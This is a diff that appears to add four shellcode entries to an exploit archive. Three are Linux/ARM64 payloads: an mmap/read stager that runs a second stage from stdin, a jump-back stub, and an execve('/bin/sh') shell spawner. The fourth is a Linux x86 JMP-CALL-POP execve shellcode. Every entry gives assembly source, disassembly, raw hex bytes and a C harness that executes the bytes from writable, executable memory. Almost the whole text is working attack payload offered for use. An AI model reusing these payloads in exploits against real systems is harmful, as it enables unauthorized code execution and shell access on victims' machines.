+/*
+# Title:  Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat stager.s
+.section .text
+.global _start
+_start:
+    // *ret = mmap(0, 0x1000, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0)
+    mov  x8, #222             // Systemcall Number = 222 (mmap)
+    mov  x0, xzr              // args[0] = 0x0
+    mov  x3, 0x22             // args[3] = 0x22
+    mvn  x4, xzr              // args[4] = -1 (0xffffffffffffffff)
+    mov  x5, xzr              // args[5] = 0x0
+    lsr  x2, x4, #61          // args[2] = 0x7
+    add  x1, x2, #0xFF9       // args[1] = 0x1000
+    svc  #0x1337              // Invoke Systemcall
+    //read(0, *ret, 0x1000)
+    mov  x2, x1               // args[2] = 0x1000 
+    add  x1, x0, xzr, lsl #12 // args[1] = *ret
+    mov  x10, x1              // save *ret to x10
+    mov  x0, xzr              // args[0] = 0x0
+    mov  x8, #63              // Systemcall Number = 63 (read)
+    svc  #0x1337              // Invoke Systemcall
+    br   x10                  // Jump to loaded shellcode
+ubuntu@ubuntu:~/works$ as -o stager.o stager.s && ld -o stager stager.o
+ubuntu@ubuntu:~/works$ objdump -d ./stager
+
+./stager:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d2801bc8 	mov	x8, #0xde                  	// #222
+  40007c:	aa1f03e0 	mov	x0, xzr
+  400080:	d2800443 	mov	x3, #0x22                  	// #34
+  400084:	aa3f03e4 	mvn	x4, xzr
+  400088:	aa1f03e5 	mov	x5, xzr
+  40008c:	d37dfc82 	lsr	x2, x4, #61
+  400090:	913fe441 	add	x1, x2, #0xff9
+  400094:	d40266e1 	svc	#0x1337
+  400098:	aa0103e2 	mov	x2, x1
+  40009c:	8b1f3001 	add	x1, x0, xzr, lsl #12
+  4000a0:	aa0103ea 	mov	x10, x1
+  4000a4:	aa1f03e0 	mov	x0, xzr
+  4000a8:	d28007e8 	mov	x8, #0x3f                  	// #63
+  4000ac:	d40266e1 	svc	#0x1337
+  4000b0:	d61f0140 	br	x10
+ubuntu@ubuntu:~/works$ (echo -en "\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4"; cat) | ./stager
+id
+uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),107(netdev)
+exit
+
+ubuntu@ubuntu:~/works$ objcopy -O binary stager stager.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
+\xc8\x1b\x80\xd2\xe0\x03\x1f\xaa\x43\x04\x80\xd2\xe4\x03\x3f\xaa\xe5\x03\x1f\xaa\x82\xfc\x7d\xd3\x41\xe4\x3f\x91\xe1\x66\x02\xd4\xe2\x03\x01\xaa\x01\x30\x1f\x8b\xea\x03\x01\xaa\xe0\x03\x1f\xaa\xe8\x07\x80\xd2\xe1\x66\x02\xd4\x40\x01\x1f\xd6
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xc8\x1b\x80\xd2\xe0\x03\x1f\xaa\x43\x04\x80\xd2\xe4\x03\x3f\xaa"
+"\xe5\x03\x1f\xaa\x82\xfc\x7d\xd3\x41\xe4\x3f\x91\xe1\x66\x02\xd4"
+"\xe2\x03\x01\xaa\x01\x30\x1f\x8b\xea\x03\x01\xaa\xe0\x03\x1f\xaa"
+"\xe8\x07\x80\xd2\xe1\x66\x02\xd4\x40\x01\x1f\xd6";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47056.c

@@ -0,0 +1,78 @@
+/*
+# Title:  Linux/ARM64 - Jump Back Shellcode + execve("/bin/sh", NULL, NULL) Shellcode (8 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat jumpback.s
+.section .text
+.global _start
+_start:
+    // Jump back to _start-0x30
+    adr  x10, .-0x30    // x10 = _start-0x30
+    br   x10            // Jump to _start-0x30
+ubuntu@ubuntu:~/works$ as -o jumpback.o jumpback.s && ld -o jumpback jumpback.o
+ubuntu@ubuntu:~/works$ objdump -d ./jumpback
+
+./jumpback:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	10fffe8a 	adr	x10, 400048 <_start-0x30>
+  40007c:	d61f0140 	br	x10
+ubuntu@ubuntu:~/works$ objcopy -O binary jumpback jumpback.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' jumpback.bin && echo
+\x8a\xfe\xff\x10\x40\x01\x1f\xd6
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+// Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
+char shell[] =
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b"
+"\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+char jumpback[] =
+"\x8a\xfe\xff\x10\x40\x01\x1f\xd6";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(jumpback));
+
+    void *ptr1 = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+    void *ptr2;
+
+    if (ptr1 == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    ptr2 = ptr1 + 0x30;
+
+    memcpy(ptr1, shell, sizeof(shell));
+    memcpy(ptr2, jumpback, sizeof(jumpback));
+
+    sc = ptr2;
+
+    sc();
+
+    return 0;
+}

shellcodes/arm/47057.c

@@ -0,0 +1,89 @@
+/*
+# Title:  Linux/ARM64 - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (48 Bytes)
+# Date:   2019-06-30
+# Tested: Ubuntu 16.04 (aarch64)
+# Author: Ken Kitahara
+# Compilation: gcc -o loader loader.c
+
+
+ubuntu@ubuntu:~/works$ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Ubuntu
+Description:	Ubuntu Xenial Xerus (development branch)
+Release:	16.04
+Codename:	xenial
+ubuntu@ubuntu:~/works$ uname -a
+Linux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux
+ubuntu@ubuntu:~/works$ cat execve2.s
+.section .text
+.global _start
+_start:
+    // execve("/bin/sh", ["/bin/sh"], NULL)
+    mov  x1, #0x622F            // x1 = 0x000000000000622F ("b/")
+    movk x1, #0x6E69, lsl #16   // x1 = 0x000000006E69622F ("nib/")
+    movk x1, #0x732F, lsl #32   // x1 = 0x0000732F6E69622F ("s/nib/")
+    movk x1, #0x68, lsl #48     // x1 = 0x0068732F6E69622F ("hs/nib/")
+    str  x1, [sp, #-8]!         // push x1
+    mov  x2, xzr                // args[2] = x2 = NULL
+    add  x0, sp, x2             // args[0] = x0 = pointer to "/bin/sh\0"
+    str  x2, [sp, #-8]!         // push x2
+    str  x0, [sp, #-8]!         // push x0
+    add  x1, sp, x2             // args[1] = x1 = ["/bin/sh", NULL]
+    mov  x8, #221               // Systemcall Number = 221 (execve)
+    svc  #0x1337                // Invoke Systemcall
+ubuntu@ubuntu:~/works$ as -o execve2.o execve2.s && ld -o execve2 execve2.o
+ubuntu@ubuntu:~/works$ objdump -d ./execve2
+
+./execve2:     file format elf64-littleaarch64
+
+
+Disassembly of section .text:
+
+0000000000400078 <_start>:
+  400078:	d28c45e1 	mov	x1, #0x622f                	// #25135
+  40007c:	f2adcd21 	movk	x1, #0x6e69, lsl #16
+  400080:	f2ce65e1 	movk	x1, #0x732f, lsl #32
+  400084:	f2e00d01 	movk	x1, #0x68, lsl #48
+  400088:	f81f8fe1 	str	x1, [sp,#-8]!
+  40008c:	aa1f03e2 	mov	x2, xzr
+  400090:	8b2263e0 	add	x0, sp, x2
+  400094:	f81f8fe2 	str	x2, [sp,#-8]!
+  400098:	f81f8fe0 	str	x0, [sp,#-8]!
+  40009c:	8b2263e1 	add	x1, sp, x2
+  4000a0:	d2801ba8 	mov	x8, #0xdd                  	// #221
+  4000a4:	d40266e1 	svc	#0x1337
+ubuntu@ubuntu:~/works$ objcopy -O binary execve2 execve2.bin
+ubuntu@ubuntu:~/works$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve2.bin && echo
+\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe2\x03\x1f\xaa\xe0\x63\x22\x8b\xe2\x8f\x1f\xf8\xe0\x8f\x1f\xf8\xe1\x63\x22\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4
+
+*/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] =
+"\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2"
+"\xe1\x8f\x1f\xf8\xe2\x03\x1f\xaa\xe0\x63\x22\x8b\xe2\x8f\x1f\xf8"
+"\xe0\x8f\x1f\xf8\xe1\x63\x22\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4";
+
+int main(int argc, char **argv) {
+    printf("Shellcode Length: %zd Bytes\n", strlen(shellcode));
+
+    void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        exit(-1);
+    }
+
+    memcpy(ptr, shellcode, sizeof(shellcode));
+    sc = ptr;
+
+    sc();
+
+    return 0;
+}

shellcodes/linux_x86/47068.c

@@ -0,0 +1,86 @@
+/*
+;Category: Shellcode
+;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique (21
+bytes)
+;Author: kiriknik
+;Date: 01/07/2019
+;Architecture: Linux x86
+
+===========
+Asm Source 
+===========
+
+global _start
+
+section .text
+_start:
+        jmp short call_shellcode
+shellcode:
+        pop ebx
+        xor eax,eax
+        mov al, 11
+        int 0x80
+
+call_shellcode:
+
+        call shellcode
+        message db "/bin/sh"
+================================
+Instruction for nasm compliation
+================================
+
+nasm -f elf32 shellcode.asm -o shellcode.o
+ld -z execstack shellcode.o -o shellcode
+
+===================
+objdump disassembly
+===================
+
+Disassembly of section .text:
+
+
+08048080 <_start>:
+ 8048080:       eb 07                   jmp    8048089 <call_shellcode>
+
+08048082 <shellcode>:
+ 8048082:       5b                      pop    %ebx
+ 8048083:       31 c0                   xor    %eax,%eax
+ 8048085:       b0 0b                   mov    $0xb,%al
+ 8048087:       cd 80                   int    $0x80
+
+08048089 <call_shellcode>:
+ 8048089:       e8 f4 ff ff ff          call   8048082 <shellcode>
+
+0804808e <message>:
+ 804808e:       2f                      das   
+ 804808f:       62 69 6e                bound  %ebp,0x6e(%ecx)
+ 8048092:       2f                      das   
+ 8048093:       73 68                   jae    80480fd <message+0x6f>
+
+==================
+21 Bytes Shellcode
+==================
+
+\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
+
+======================
+C Compilation And Test
+======================
+
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+/*
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x07\x5b\x31\xc0\xb0\x0b\xcd\x80\xe8\xf4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+
+}